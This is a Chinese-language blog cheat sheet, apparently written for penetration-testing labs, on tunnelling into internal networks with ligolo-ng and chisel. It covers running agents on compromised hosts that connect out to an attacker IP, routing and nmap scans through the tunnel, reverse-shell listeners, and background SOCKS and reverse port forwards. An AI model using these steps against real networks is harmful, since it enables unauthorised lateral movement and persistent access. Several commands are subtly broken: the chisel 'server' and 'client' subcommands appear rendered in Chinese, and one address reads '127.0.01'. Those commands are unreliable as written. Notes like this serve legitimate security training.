Port redirection && Tunnel

ligolo-ng

初始化操作:

1
2
sudo ip tuntap add user /your_username/ mode tun ligolo
sudo ip link set ligolo up

启动服务端:

1
./proxy -selfcert

客户端连接(在内网机器上执行,要求能出网):
windows:

1
.\agent.exe -connect 192.168.45.248:11601 -ignore-cert

linux:

1
./agent -connect 192.168.45.153:11601 -ignore-cert

随后在服务端添加网段:

1
sudo ip route add 172.16.216.0/24 dev ligolo

然后选择session并启动隧道连接
session命令选择session,然后输入start启动连接
随后便可以使用nmap扫描内网:

1
nmap -sn 172.16.1.0/24

设置监听器:

1
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443

可以用来接收反弹的shell和创建web服务传输文件,使用listener_list可以查看监听器列表

chisel

客户端和服务器版本应该相同
它无法在内网中监听反向shell!!!

由于其特殊性,有时不会被防火墙等发现或阻止。
但是执行nmap扫描时会花费更多时间,因为socks代理只支持TCP扫描。而chisel无法接收反向shell。

socks 代理

kali:

1
chisel 服务器 --port 8080 --reverse

目标:
后台运行

1
Start-Job -ScriptBlock { c:\my\chisel.exe 客户端 192.168.45.218:8080 R:socks }
1
/tmp/chisel 客户端 192.168.45.153:8080 R:socks > /dev/null 2>&1 &

直接运行

1
c:\my\chisel.exe 客户端 192.168.45.218:8080 R:socks
1
/tmp/chisel 客户端 192.168.45.153:8080 R:socks

然后使用代理执行命令与内网通信

端口转发

反向模式:将客户端的 remote:port 共享给服务器的 local:port
严格模式:将服务器的 remote:port 共享给客户端的 local:port
反向连接比正向连接更常见。因为防火墙会阻止我们主动连接到目标服务器:

1
chisel 服务器 --port 8080 --reverse
1
chisel.exe 服务器 --port 8080 --reverse

客户端:

1
/tmp/chisel 客户端 192.168.45.153:8080 R:8000:127.0.0.1:8000
1
.\chisel.exe 客户端 192.168.45.153:8080 R:8000:127.0.0.1:8000

后台运行

1
/tmp/chisel 客户端 192.168.45.220:8080 R:8000:127.0.0.1:8000 &
1
Start-Job -ScriptBlock { .\chisel.exe 客户端 192.168.45.153:8080 R:8000:127.0.0.1:8000 }

多个端口

1
/tmp/chisel 客户端 192.168.45.153:51234 R:8000:127.0.0.1:8000 R:8443:127.0.01:8443
1
2
# “R” 是 “127.0.0.1” 的简写
# 实际上,在攻击主机上监听 127.0.0.1

只需添加 remote_socket


Port redirection && Tunnel
https://rightevil.github.io/Port-redirection-Tunnel/
作者
rightevil
发布于
2024年2月13日
许可协议